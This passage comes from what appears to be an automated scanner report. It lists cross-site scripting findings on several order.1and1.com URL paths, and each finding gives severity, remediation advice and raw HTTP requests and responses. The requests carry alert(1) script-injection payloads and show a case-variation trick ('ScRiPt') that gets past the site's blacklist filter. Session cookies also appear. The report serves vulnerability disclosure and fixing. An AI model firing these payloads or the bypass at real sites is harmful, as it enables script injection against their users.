Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/DomaininfoMoved1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:26 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:38:33 GMT; Path=/
ETag: c7593eca9d95d112a774e3b42a8bf63f
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24356


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="DomaininfoMove";UNOUNO.params.lastpage="DomaininfoMoved1dbe</ScRiPt ><ScRiPt>alert(1)</ScRiPt>3ccb96b7437";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.3. http://order.1and1.com/xml/order/Eshops [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Eshops is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Eshops. The payload f145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5 was submitted in the REST URL parameter 3. This input was returned as f145e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>222daa67bf5 in a subsequent request for the URL /xml/order/Eshops.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Eshopsf145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:34:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:48:28 GMT; Path=/
ETag: 425493d0f8ed0f19e7a04c07ddd3cc38
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 64275


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
F99CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Eshops";UNOUNO.params.lastpage="Eshopsf145e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>222daa67bf5";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.4. http://order.1and1.com/xml/order/FeatureDatabaseDatabase [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseDatabase

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureDatabaseDatabase is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureDatabaseDatabase. The payload 9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0 was submitted in the REST URL parameter 3. This input was returned as 9ead5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>428693372d0 in a subsequent request for the URL /xml/order/FeatureDatabaseDatabase.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureDatabaseDatabase9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureDatabaseDatabase;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:40:53 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=LcWY2OTowWVlZU2ZcYylhWygaO3RnYTlQQz0lKSYmJSMlIyAgIyIcHyMtLy4tKk89aV5gbiYoI1MsVmUrHh8bGjYyMDMxKzMqKTJqazEmLV1mLB8gHBsgNDE0LzIzLC0=; Expires=Fri, 07-Apr-2079 21:55:00 GMT; Path=/
ETag: 53f791f92af4dbedadc8055ee2452240
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17973


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureDatabaseDatabase";UNOUNO.params.lastpage="FeatureDatabaseDatabase9ead5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>428693372d0";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.5. http://order.1and1.com/xml/order/FeatureEmailEmail [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailEmail

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailEmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailEmail. The payload f6a45</ScRiPt%20>ca9d9974f55 was submitted in the REST URL parameter 3. This input was returned as f6a45</ScRiPt >ca9d9974f55 in a subsequent request for the URL /xml/order/FeatureEmailEmail.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureEmailEmailf6a45</ScRiPt%20>ca9d9974f55;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureEmailEmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:41:30 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=obmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS4xLC8wKSo=; Expires=Fri, 07-Apr-2079 21:55:37 GMT; Path=/
ETag: 242b6a1e5eeabc95b2abaab00ee5cf77
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19175


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureEmailEmail";UNOUNO.params.lastpage="FeatureEmailEmailf6a45</ScRiPt >ca9d9974f55";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.6. http://order.1and1.com/xml/order/FeatureEmailWebmail [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailWebmail

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailWebmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailWebmail. The payload 45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 was submitted in the REST URL parameter 3. This input was returned as 45663</ScRiPt ><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 in a subsequent request for the URL /xml/order/FeatureEmailWebmail.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureEmailWebmail45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureEmailWebmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:41:53 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ObmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS4xLC8wKSo=; Expires=Fri, 07-Apr-2079 21:56:00 GMT; Path=/
ETag: 3a27e5470d1c0301a5f75b92d0fc9df4
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16817


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
ix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureEmailWebmail";UNOUNO.params.lastpage="FeatureEmailWebmail45663</ScRiPt ><ScRiPt>alert(1)</ScRiPt>f29e6be5a86";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.7. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureGuaranteeMoneyback

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureGuaranteeMoneyback is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureGuaranteeMoneyback. The payload 83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d was submitted in the REST URL parameter 3. This input was returned as 83c9e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>eed4e62047d in a subsequent request for the URL /xml/order/FeatureGuaranteeMoneyback.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureGuaranteeMoneyback83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureGuaranteeMoneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

